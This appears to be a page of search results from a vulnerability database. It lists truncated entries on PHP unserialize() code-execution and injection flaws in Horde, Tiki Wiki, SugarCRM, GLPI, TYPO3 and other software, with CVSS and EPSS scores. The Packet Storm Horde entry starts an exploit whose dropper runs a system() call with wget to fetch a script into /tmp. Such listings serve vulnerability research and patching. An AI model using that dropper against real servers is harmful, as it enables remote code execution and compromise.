Lucene search
K

1318 matches found

seebug.org
seebug.org
added 2014/07/01 12:0 a.m.46 views

Horde Framework Unserialize PHP Code Execution

No description provided by source. This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def...

7.5CVSS0.3AI score0.42895EPSS
Exploits7
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.67 views

Invision IP.Board <= 3.3.4 unserialize() PHP Code Execution

No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.17 views

Tiki Wiki <= 8.3 unserialize() PHP Code Execution

No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.22 views

PHP < 4.5.0 - unserialize Overflow

No description provided by source. $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.31 views

CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit

No description provided by source. $Id: cakephpcachecorruption.rb 11579 2011-01-14 16:25:37Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.21 views

PHP 3/4/5 Multiple Local And Remote Vulnerabilities (1)

No description provided by source. source: http://www.securityfocus.com/bid/11964/info PHP4 and PHP5 are reported prone to multiple local and remote vulnerabilities that may lead to code execution within the context of the vulnerable process. The following specific issues are reported: A heap-bas...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.49 views

Tiki Wiki CMS Groupware <= 8.3 "unserialize()" PHP Code Execution

Tiki Wiki CMS Groupware 'unserialize'多个远程PHP代码执行漏洞 漏洞类型: 设计缺陷 漏洞成因: Tiki Wiki CMS Groupware v6.9、9.3之前版本存在安全漏洞,某些脚本对用户控制的输入使用了 "unserialize"操作,攻击者可利用此漏洞在受影响应用中注入和执行任意PHP代码。 修补建议: 更新到最新版本 http://info.tiki.org/article210-Tiki-10-0-is-here ?php /...

7.5CVSS0.2AI score0.62989EPSS
Exploits12
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.37 views

PHP <= 4.3.9 & phpBB 2.x with unserialize() Remote Exploit (compiled)

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.34 views

SugarCRM CE <= 6.3.1 "unserialize()" PHP Code Execution

No description provided by source. ?php / ------------------------------------------------------- SugarCRM CE = 6.3.1 unserialize PHP Code Execution ------------------------------------------------------- author...........: Egidio Romano aka EgiX mail.............: n0b0d13satgmaildotcom software...

0.2AI score0.67256EPSS
Exploits13
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.36 views

RunCms <= 1.5.2 (debug_show.php) Remote SQL Injection Exploit

No description provided by source. ?php printr' -------------------------------------------------------------------------- RunCms = 1.5.2 /class/debug/debugshow.php sql injection / credentials disclosure exploit by rgod mail: retrog at alice dot it site: http://retrogod.altervista.org dork: Runcm...

7.1AI score
Exploits0
Packet Storm
Packet Storm
added 2014/06/29 12:0 a.m.66 views

Horde Framework Unserialize PHP Code Execution

ported from metasploit by irrlicht june 2014 modify dropper url and run use strict; use warnings; use LWP::UserAgent; use WWW::Mechanize; use MIME::Base64; if !$ARGV0 print "specify full login.php url\n"; exit; my $dropper = 'system"mkdir /tmp/\" \"; cd /tmp/\" \"; wget -O deploy.pl...

7.5CVSS0.1AI score0.42895EPSS
Exploits7
Tenable Nessus
Tenable Nessus
added 2014/06/27 12:0 a.m.217 views

PHP 5.4.x < 5.4.30 Multiple Vulnerabilities

According to its banner, the version of PHP 5.4.x installed on the remote host is a version prior to 5.4.30. It is, therefore, affected by the following vulnerabilities : - Boundary checking errors exist related to the Fileinfo extension, Composite Document Format CDF handling and the functions...

7.5CVSS7.7AI score0.30128EPSS
Exploits6References26
Tenable Nessus
Tenable Nessus
added 2014/06/19 12:0 a.m.37 views

openSUSE Security Update : typo3-cms-4_5 (openSUSE-SU-2014:0813-1)

typo3-cms-45 was updated to version 4.5.34 to fix eight security vulnerabilities and several other bugs. These security problems where fixed : - Add trusted HTTPHOST configuration CVE-2014-3941 - XSS in old extension manager information function CVE-2014-3943 - XSS in new content element wizard...

6CVSS5.5AI score0.02662EPSS
Exploits0References7
Cvelist
Cvelist
added 2014/05/27 3:0 p.m.36 views

CVE-2013-2225

inc/ticket.class.php in GLPI 0.83.9 and earlier allows remote attackers to unserialize arbitrary PHP objects via the predefinedfields parameter to front/ticket.form.php...

7.6AI score0.07563EPSS
Exploits2References6
CVE
CVE
added 2014/05/27 3:0 p.m.62 views

CVE-2013-2225

CVE-2013-2225 affects GLPI: inc/ticket.class.php in GLPI 0.83.9 and earlier allows remote attackers to unserialize arbitrary PHP objects via _predefined_fields in front/ticket.form.php. OpenVAS/Mageia advisories confirm the issue and indicate a fix was released: upgrade to GLPI 0.83.91 (and patch...

6.4CVSS7.4AI score0.07563EPSS
Exploits2References6Affected Software1
NVD
NVD
added 2014/05/27 2:55 p.m.20 views

CVE-2013-2225

inc/ticket.class.php in GLPI 0.83.9 and earlier allows remote attackers to unserialize arbitrary PHP objects via the predefinedfields parameter to front/ticket.form.php...

6.4CVSS7.6AI score0.07563EPSS
Exploits2References6
Prion
Prion
added 2014/05/27 2:55 p.m.27 views

Code injection

inc/ticket.class.php in GLPI 0.83.9 and earlier allows remote attackers to unserialize arbitrary PHP objects via the predefinedfields parameter to front/ticket.form.php...

6.4CVSS7.2AI score0.07563EPSS
Exploits2References6Affected Software1
UbuntuCve
UbuntuCve
added 2014/05/27 2:55 p.m.26 views

CVE-2013-2225

inc/ticket.class.php in GLPI 0.83.9 and earlier allows remote attackers to unserialize arbitrary PHP objects via the predefinedfields parameter to front/ticket.form.php...

6.4CVSS7.2AI score0.07563EPSS
Exploits2References2
Typo3
Typo3
added 2014/05/22 12:0 a.m.179 views

Multiple Vulnerabilities in TYPO3 CMS

It has been discovered that TYPO3 CMS is vulnerable to Cross-Site Scripting, Insecure Unserialize, Improper Session Invalidation, Authentication Bypass, Information Disclosure and Host Spoofing. Component Type: TYPO3 CMS Vulnerability Types: Cross-Site Scripting, Insecure Unserialize, Improper...

6CVSS6AI score0.04465EPSS
Exploits0Affected Software1
Check Point Advisories
Check Point Advisories
added 2014/05/18 12:0 a.m.2 views

Horde Framework Unserialize PHP Code Execution (CVE-2014-1691)

An arbitrary PHP code execution vulnerability has been reported in Horde . An attacker can exploit this vulnerability to execute arbitrary code with the permissions of the web server...

3.2AI score0.42895EPSS
Exploits7
Rows per page
Query Builder